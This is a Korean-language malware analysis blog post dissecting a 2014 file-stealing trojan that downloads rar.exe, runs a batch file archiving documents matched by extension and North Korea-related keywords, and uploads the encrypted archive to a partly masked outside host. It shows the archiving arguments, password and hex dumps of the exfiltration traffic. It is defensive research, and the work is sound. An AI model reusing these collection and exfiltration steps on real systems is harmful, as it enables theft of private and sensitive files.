2014년 11월 11일 발견된 "Isass.exe" 라는 이름의 악성코드는 감염 시, "rar.exe" 라는 정상 압축 프로그램을 이용하여 시스템의 중요한 파일들을 찾아 압축 후, 공격자에게 전송하는 기능을 수행한다. 국내에 감염이 최초 확인된 것은 2013년 8월로 당시에는 취약한 문서파일 통해 최초 감염이 이루어졌다. 하지만, 최근 발견된 샘플은 아직 정확한 감염경로를 확인하지 못한 상태이다. 악성코드의 동작과정을 살펴보면 특정 사이트로 부터 [1] "rar.exe" 파일에 대한 다운로드가 이루어지며, [2] "ebgEC50.bat" 파일생성을 통한 중요파일들 압축을 수행하고, [3] 최종 압축한 파일("NETUSER.001")을 공격자에게 전송의 과정으로 이루어진다.

 

 

 [1] "rar.exe" 파일 다운로드

 

악성코드는 아래의 %TEMP% 폴더에 "rar.exe" 라는 파일의 존재여부를 체크한다. 만약, 해당 파일이 존재하지 않을 경우, 특정 사이트로 접속하여 "rar.exe" 를 다운로드 시도하며 이미 존재할 경우, 다운로드 과정을 생략한다.

 

- "C:\Documents and Settings\UserProfile\Local Settings\Temp\rar.exe"

 

"rar.exe" 파일을 다운로드 받는 곳의 주소는 아래와 같고, 전송(send) 하는 데이터의 내용은 다음과 같다.

 

- k??32.k??.org/file/lecture/list.php (다운로드 주소)

 

 0081CF70  50 4F 53 54 20 2F 66 69 6C 65 2F 6C 65 63 74 75  POST /file/lectu
 0081CF80  72 65 2F 6C 69 73 74 2E 70 68 70 20 48 54 54 50  re/list.php HTTP
 0081CF90  2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 6B ?? ?? 33  /1.1..Host: k??3
 0081CFA0  32 2E 6B ?? ?? 2E 6F 72 67 3A 38 30 0D 0A 43 6F  2.k??.org:80..Co
 0081CFB0  6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C  ntent-type: appl
 0081CFC0  69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
 0081CFD0  72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
 0081CFE0  6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 31  ontent-Length: 1
 0081CFF0  31 0D 0A 0D 0A 66 66 3D 33 39 38 37 32 39 33 38  1....ff=39872938
 0081D000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 

 

서버로 부터 정상적으로 응답 데이터를 받을 경우, 아래와 같은 형태를 갖는다. 데이터 내용 중, 'MZ'로 시작하는 부분이 "rar.exe"의 시작을 나타낸다. 분석 당시 "rar.exe" (md5:070d15cd95c14784606ecaa88657551e) 파일의 버전은 5.1.0 로 확인되었다.

 

 0081D7C0  48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
 0081D7D0  0A 44 61 74 65 3A 20 57 65 64 2C 20 31 39 20 4E  .Date: Wed, 19 N
 0081D7E0  6F 76 20 32 30 31 34 20 31 30 3A 32 36 3A 32 37  ov 2014 10:26:27
 0081D7F0  20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
 0081D800  61 63 68 65 0D 0A 58 2D 50 6F 77 65 72 65 64 2D  ache..X-Powered-
 0081D810  42 79 3A 20 50 48 50 2F 34 2E 34 2E 39 0D 0A 43  By: PHP/4.4.9..C
 0081D820  6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 69  ontent-Dispositi
 0081D830  6F 6E 3A 20 61 74 74 61 63 68 6D 65 6E 74 3B 20  on: attachment;
 0081D840  66 69 6C 65 6E 61 6D 65 3D 22 62 62 73 5F 77 72  filename="bbs_wr
 0081D850  69 74 65 2E 70 68 70 22 0D 0A 4C 61 73 74 2D 4D  ite.php"..Last-M
 0081D860  6F 64 69 66 69 65 64 3A 20 54 68 75 2C 20 31 36  odified: Thu, 16
 0081D870  20 4F 63 74 20 32 30 31 34 20 31 30 3A 35 37 3A   Oct 2014 10:57:
 0081D880  34 39 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52  49 GMT..Accept-R
 0081D890  61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 61  anges: bytes..Ca
 0081D8A0  63 68 65 2D 63 6F 6E 74 72 6F 6C 3A 20 70 72 69  che-control: pri
 0081D8B0  76 61 74 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E  vate..Connection
 0081D8C0  3A 20 43 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74  : Close..Content
 0081D8D0  2D 4C 65 6E 67 74 68 3A 20 34 39 30 30 37 32 0D  -Length: 490072.
 0081D8E0  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61  .Content-Type: a
 0081D8F0  70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74  pplication/octet
 0081D900  2D 73 74 72 65 61 6D 0D 0A 0D 0A 4D 5A 90 00 03  -stream....MZ?
 0081D910  00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00  ........?...
 0081D920  00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00  ...@............
 0081D930  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 0081D940  00 00 00 00 00 00 00 E0 00 00 00 0E 1F BA 0E 00  .......?..?. 
 0081D950  B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72  ???L?This pr   
 0081D960  6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20  ogram cannot be
 0081D970  72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E  run in DOS mode.

 

다운로드 실패 시, 10분간의 Sleep() 후, 재시도를 한다. 다운로드가 성공적으로 이루어진 경우, %TEMP% 폴더에 "rar.exe" 파일을 Write 한다. 다운로드가 성공적으로 이루어졌는지에 대한 검증은 서버로 부터 받은 데이터를 통해 이루어지며, 아래의 3가지 과정을 거친다.

 

(1) "HTTP/1.1 200 OK" 문자열 존재해야 함.

 

(2) "error" 문자열이 없어야 함.

 

(3) CR,LF,CR,LF (0x0D, 0x0A, 0x0D, 0x0A) 다음("MZ")부터 버퍼 끝까지의 크기와 "Content-Length: "에 명시된 값("490072")과의 비교를 수행. (만약, 명시된 값과 동일하지 않을 경우, "rar.exe" 삭제 후, 다운로드 과정을 재 시도)

 

 

[2] "ebgEC50.bat" 파일생성

 

"rar.exe" 파일을 다운로드 한 후, 악성코드는 %TEMP% 폴더에 "ebgEC50.bat" 파일을 생성 및 실행하는 기능을 수행한다. BAT 파일의 내용에 해당하는 데이터는 악성코드 내부에 존재하며, 암호화된 형태로 저장되어 있다. BAT 파일의 내용 뿐 아니라 악성코드 내부에는 중요한 문자열 정보가 암호화된 형태로 존재하며, 아래와 같은 과정을 통해 만들어지는 특징을 갖는다.

 

다음은 악성코드 내부에서 "r.a.r...e.x.e" 문자열 정보를 만들어 내는 과정을 나타낸다. 0xB5 값을 초기값으로 하여, 특정 값과 ADD/SUB 연산을 통해 그 다음 암호화된 값을 생성한다.

 

 

위의 코드를 통해 최초 생성된 암호화된 데이터는 다음과 같다.

(0xB5 0x00 0xA6 0x00 0xB5 0x00 0xE9 0x00 0xA2 0x00 0xBF 0x00 0xA2 0x00 0x00 0x00)

 

이렇게 생성된 값은 아래의 XOR 과정을 통해 최종 복호화가 이루어진다. (키값은 0xC7, 크기는 0x07)

 

 

위의 코드를 통해 최종 생성된 복호화된 데이터는 다음과 같다. ("r.a.r...e.x.e")

(0x72 0x00 0x61 0x00 0x72 0x00 0x2E 0x00 0x65 0x00 0x78 0x00 0x65 0x00 0x00 0x00)

 

악성코드 내부에 이러한 방식으로 암호화되어 저장된 문자열 정보는 총 19개이며, 복호화 방식은 1바이트 XOR (18개)와 1바이트 ADD/SUB 형태(1개)가 존재한다.

 

아래의 [표-1]~[표-19]는 복호화 과정 후, 생성된 문자열 정보를 나타낸다.

 

 

 

"ebgEC50.bat" 파일의 내용은 [표-10]에 의해 만들어지며, 감염 시스템의 주요 문서와 특정 확장자 파일들에 대한 유출기능을 갖는다.

 

"ebgEC50.bat" 파일은 구동 시, %TEMP%\rar.exe 파일을 실행하며, "rar.exe" 파일에서 제공하는 다양한 인자값들을 사용하였다.  아래는 다양한 인자값들 중 악성코드에서 사용한 인자값들을 나타낸다.

 

 

"%TEMP%\rar.exe" a "%temp%\NETUSER.001" 를 통해, 최종 압축된 파일은 "NETUSER.001" 임을 알 수 있다. 또한, "%USERPROFILE%" 경로와 'a', 'b', 'c' 드라이브를 제외한 모든 드라이브의 파일들이 검색 대상임을 알 수 있다. (d:\ e:\ f:\ g:\ h:\ i:\ j:\ k:\ l:\ m:\ n:\ o:\ p:\ q:\ r:\ s:\ t:\ u:\ v:\ w:\ x:\ y:\ z:\)

 

-hp1qaz@WSX3edc$RFV -r -v2g -vn -m5 -y -ep3 -ta2005 -sl2048576 를 통해 최종 압축된 파일에 대한 암호가 '1qaz@WSX3edc$RFV' 로 설정되며, 2005년 이후 생성된 파일 및 2048576(2M) 보다 작은 크기의 파일들이 유출대상임을 알 수 있다.

 

또한, 파일명에 대한 필터조건으로 특정 이름을 갖는 파일들을 선별하여 유출하도록 하였으며, 파일이름에 상관없이 특정 확장자를 갖는 파일들에 대해서도 유출이 이루어진다.

 

(1) 확장자 필터조건

*.lnk, *.hwp, *.doc, *.docx, *.xls, *.xlsx, *.amr, *.zip, *.eml, *.alz, *.rar, *.egg

 

(2) 파일이름 필터조건

*암호*, *비번*, *비밀*, *보안*, *정보*, *소식*, *자료*, *분석*, *관리*, *수집*, *녹취*, *대화*, *녹음*, *정세*, *계획*, *보고*, *출장*, *이력*, *프로포절*, *협조자*, *취재원*, *북핵*, *전략*, *전술*, *미사일*, *로케트*, *북핵*, *주소*, *명단*, *리스트*, *중국*, *심양*, *단동*, *연길*, *대련*, *베이징*, *북한*, *평양*, *회령*, *신의주*, *무산*, *청진*, *원산*, *개성*, *남포*, *만포*, *국경*, *내곡동*, *여의도*, *경비대*, *총정치국*, *보위*, *군단*, *사단*, *련대*, *대대*, *중대*, *소대*, *려단*, *하나원*, *기무*, *정보사*, *국정원*, *기구*, *국방*, *사령부*, *외교*, *통일*, *인권*, *동지*, *성통만사*, *탈북*, *이탈*, *겨레얼*, *전략*, *난민*, *서평*, *뉴포커스*, *새터민*, *mopas*, *엔케이*, *홈페*

 

아래의 그림은 "ebgEC50.bat" 수행 후, 생성된 "NETUSER.001" 파일을 압축해제 시, 폴더구조를 나타낸다. 각 드라이브 별로 파일들이 저장되어 있음을 알 수 있다.

 

 

 

 

[3] 압축파일(NETUSER.001) 전송

 

 공격자에게 전송되는 파일은 아래의 경로의 RAR 압축파일이다.

- C:\Documents and Settings\UserProfile\Local Settings\Temp\NETUSER.001

 

아래는 공격자에게 전송되는 데이터의 내용을 나타낸다.

 

  0080883C  50 4F 53 54 20 2F ?? ?? ?? ?? ?? ?? ?? ?? 2F 42   POST /????????/B
 0080884C  4F 41 52 44 2F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??   OARD/???????????
 0080885C  2F 31 34 30 36 2F 6C 69 73 74 2E 70 68 70 20 48   /1406/list.php H
 0080886C  54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 2D   TTP/1.1..Accept-
 0080887C  45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20   Encoding: gzip,
 0080888C  64 65 66 6C 61 74 65 0D 0A 55 73 65 72 2D 41 67   deflate..User-Ag
 0080889C  65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30   ent: Mozilla/4.0
 008088AC  20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53    (compatible; MS
 008088BC  49 45 20 36 2E 30 3B 20 57 69 6E 64 6F 77 73 20   IE 6.0; Windows
 008088CC  4E 54 20 35 2E 31 3B 20 53 56 31 29 0D 0A 41 63   NT 5.1; SV1)..Ac
 008088DC  63 65 70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C   cept: image/gif,
 008088EC  20 69 6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70    image/x-xbitmap
 008088FC  2C 20 69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D   , image/jpeg, im
 0080890C  61 67 65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69   age/pjpeg, appli
 0080891C  63 61 74 69 6F 6E 2F 78 2D 73 68 6F 63 6B 77 61   cation/x-shockwa
 0080892C  76 65 2D 66 6C 61 73 68 2C 20 2A 2A 0D 0A 41 63   ve-flash, **..Ac
 0080893C  63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65   cept-Language: e
 0080894C  6E 2D 75 73 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79   n-us..Content-Ty
 0080895C  70 65 3A 20 6D 75 6C 74 69 70 61 72 74 2F 66 6F   pe: multipart/fo
 0080896C  72 6D 2D 64 61 74 61 3B 62 6F 75 6E 64 61 72 79   rm-data;boundary
 0080897C  3D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   =---------------
 0080898C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30 34   --------------04
 0080899C  65 32 38 30 30 30 30 35 64 63 62 0D 0A 48 6F 73   e2800005dcb..Hos
 008089AC  74 3A 20 63 ?? ?? 6A 65 6F 6E 2E 63 6F 6D 3A 38   t: c??jeon.com:8
 008089BC  30 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74   0..Content-Lengt
 008089CC  68 3A 20 31 30 34 38 39 32 34 0D 0A 43 6F 6E 6E   h: 1048924..Conn
 008089DC  65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69   ection: Keep-Ali
 008089EC  76 65 0D 0A 43 61 63 68 65 2D 43 6F 6E 74 72 6F   ve..Cache-Contro
 008089FC  6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 0D 0A 00   l: no-cache.....
 00808A0C  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

 

아래의 전송하는 데이터 중, 붉은 색으로 표시한 부분은 감염 시스템의 MAC 주소이며, 이를 "id" 값으로 사용함을 알 수 있다.

 

 0080CD6C  0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ..--------------
 0080CD7C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ----------------
 0080CD8C  2D 30 34 65 32 38 30 30 30 30 35 64 63 62 0D 0A   -04e2800005dcb.. 
 0080CD9C  43 6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74   Content-Disposit
 0080CDAC  69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20   ion: form-data;
 0080CDBC  6E 61 6D 65 3D 22 69 64 22 0D 0A 0D 0A 30 30 31   name="id"....001
 0080CDCC  64 ?? ?? ?? 36 63 66 37 64 0D 0A 2D 2D 2D 2D 2D   d???6cf7d..-----
 0080CDDC  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ----------------
 0080CDEC  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30 34 65 32 38 30   ----------04e280
 0080CDFC  30 30 30 35 64 63 62 2D 2D 0D 0A 00 00 00 00 00   0005dcb--....... 

 

아래의 전송하는 데이터를 통해 해당 악성코드 제작자가 중국인으로 추정된다. ("wenjian")

 

  0080861C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D   ----------------
 0080862C  2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 30   ---------------0
 0080863C  34 65 32 38 30 30 30 30 35 64 63 62 0D 0A 43 6F   4e2800005dcb..Co
 0080864C  6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 69 6F   ntent-Dispositio
 0080865C  6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61   n: form-data; na
 0080866C  6D 65 3D 22 77 65 6E 6A 69 61 6E 22 3B 20 66 69   me="wenjian"; fi
 0080867C  6C 65 6E 61 6D 65 3D 22 43 3A 5C 44 4F 43 55 4D   lename="C:\DOCUM
 0080868C  45 7E 31 5C ?? ?? ?? ?? ?? ?? 5C 4C 4F 43 41 4C   E~1\??????\LOCAL
 0080869C  53 7E 31 5C 54 65 6D 70 5C 4E 45 54 55 53 45 52   S~1\Temp\NETUSER
 008086AC  2E 30 30 31 22 0D 0A 43 6F 6E 74 65 6E 74 2D 54   .001"..Content-T
 008086BC  79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E   ype: application
 008086CC  2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 0D   /octet-stream...
 008086DC  0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

 

공격자에게 전송하는 NETUSER.001 파일은 최종 전송과정에서 0xAB로 XOR를 통해 암호화하여 전송된다. 또한, 서버로 부터 받은 데이터 중, 특정 문자열 확인을 통해 전송의 종료여부를 체크하는 것으로 추정된다. 아래는 분석당시 서버로 부터 전달받은 데이터를 나타낸다.

 

 0080CE7C  48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D   HTTP/1.1 200 OK.
 0080CE8C  0A 44 61 74 65 3A 20 57 65 64 2C 20 31 39 20 4E   .Date: Wed, 19 N
 0080CE9C  6F 76 20 32 30 31 34 20 31 32 3A 30 31 3A 34 33   ov 2014 12:01:43
 0080CEAC  20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 4D 69    GMT..Server: Mi
 0080CEBC  63 72 6F 73 6F 66 74 2D 49 49 53 2F 35 2E 30 0D   crosoft-IIS/5.0.
 0080CECC  0A 58 2D 50 6F 77 65 72 65 64 2D 42 79 3A 20 50   .X-Powered-By: P
 0080CEDC  48 50 2F 35 2E 32 2E 31 37 0D 0A 43 6F 6E 74 65   HP/5.2.17..Conte
 0080CEEC  6E 74 2D 4C 65 6E 67 74 68 3A 20 36 0D 0A 4B 65   nt-Length: 6..Ke
 0080CEFC  65 70 2D 41 6C 69 76 65 3A 20 74 69 6D 65 6F 75   ep-Alive: timeou
 0080CF0C  74 3D 35 2C 20 6D 61 78 3D 31 30 30 0D 0A 43 6F   t=5, max=100..Co
 0080CF1C  6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41   nnection: Keep-A
 0080CF2C  6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79   live..Content-Ty
 0080CF3C  70 65 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D   pe: text/html...
 0080CF4C  0A 63 68 67 6F 6E 67 00 00 00 00 00 00 00 00 00   .chgong.........
 0080CF5C  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

 

"rar.exe" 파일에 대한 다운로드를 성공적으로 수행했는지 여부를 체크한 것과 유사한 방식으로 서버로 부터 전달받은 버퍼 중, 특정 문자열 패턴의 존재여부를 체크한다.

 

(1) "HTTP/1.1 200 OK" 문자열이 존재해야 함.

 

(2) CR,LF,CR,LF (0x0D, 0x0A, 0x0D, 0x0A) 다음에 "sibai" 라는 문자열이 존재하는 지 체크.

 

모든 과정이 종료된 후, %TEMP% 폴더의 "NETUSER.001"과 "ebgEC50.bat"은 삭제된다.

 

 

[4] 분석파일들

 

(1) Isass.exe (md5: E60958951B83B52A328C4E4E2EB58C6C) - Trojan/Win32.Compfolder

(2) rar.exe (070D15CD95C14784606ECAA88657551E) - 정상파일

(3) ebgEC50.bat (md5: 0C256742B5A396CC4DD8BBAC7C69F556) - BAT/Filestealer

 

 

[5] 유사 파일들에 대한 PDB정보

 

(1)Isass.exe

- V3: Trojan/Win32.Compfolder

- md5: b0d0a27bcc9d6e6a549782e1f6a934ee

- PDB: F:\WorkingSource\First_Stage\CompressFolder\Release\CompressFolder.pdb

 

(2) svchost.exe

- V3: Trojan/Win32.Compfolder

- md5: ebd638798aa7920151f1fd3197403ef0

- PDB: F:\WorkingSource\First_Stage\svchost(excute exe)\Release\svchost.pdb

 

(3) svchost.exe

- V3: Trojan/Win32.Compfolder

- md5: 54758b6fafa545f09bf2fff82b3b343b

- PDB" F:\WorkingSource\SecondStage\svchost(service install)X86\Release\svchost.pdb

 

(4) svchost.exe

- V3: Trojan/Win32.Compfolder

- md5: 85d85a6075a04ae24fb5c0004405d548

- PDB: G:\MyCreateProject\MyActive\svchost(excute exe)\Release\svchost.pdb

 

(5) lsuss.exe

- V3: Trojan/Win32.Compfolder

- md5: 4c062c27bf2ff9ba71abd9682eb17c93

- PDB: F:\WorkingSource\Util\KeyLog\Release\Keylog.pdb

 

(6) USASS.EXE 

- V3: Trojan/Win32.Compfolder

- md5: 3bb9d56cb39d0422964f781d8d948cb8

- PDB: G:\MyProject\1st\CompressFolder\Release\CompressFolder.pdb

 

 

 

Creative Commons License
Creative Commons License
Posted by yhayoung